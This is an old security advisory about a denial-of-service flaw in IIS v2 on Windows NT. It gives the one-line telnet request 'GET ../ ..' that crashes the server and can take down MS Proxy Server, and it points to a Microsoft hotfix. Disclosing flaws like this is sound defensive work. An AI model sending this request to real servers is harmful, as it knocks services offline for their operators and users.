DATE:  
COMMAND                                            SOURCE: 
                                                   AUTHOR: 
  IIS

SYSTEMS AFFECTED

  WinNT Systems running IIS v2
  

PROBLEM


    Run Telnet, enter  the IP address  of the server.  Choose Port 80.
    Issue the command GET ../ .. <ENTER>

    Additionally, if  the Web  site is  running MS  Proxy Server,  the
    proxy  crashes  too  --  potentially  exposing  the entire network
    depending on how it is built, numbered, and routed.

    This attack causes  Dr. Watson to  display an alert  window and to
    log an error:

        "The application, exe\inetinfo.dbg, generated an
        application error The error occurred on date@ time The
        exception generated was c0000005 at address 53984655
        (TCP_AUTHENT::TCP_AUTHENT"



EXPLOIT

  

SOLUTION


    A hot-fix  is available  from Microsoft's  FTP site.  This hot-fix
    has been included in Service Pack 2 for NT 4.0 as well.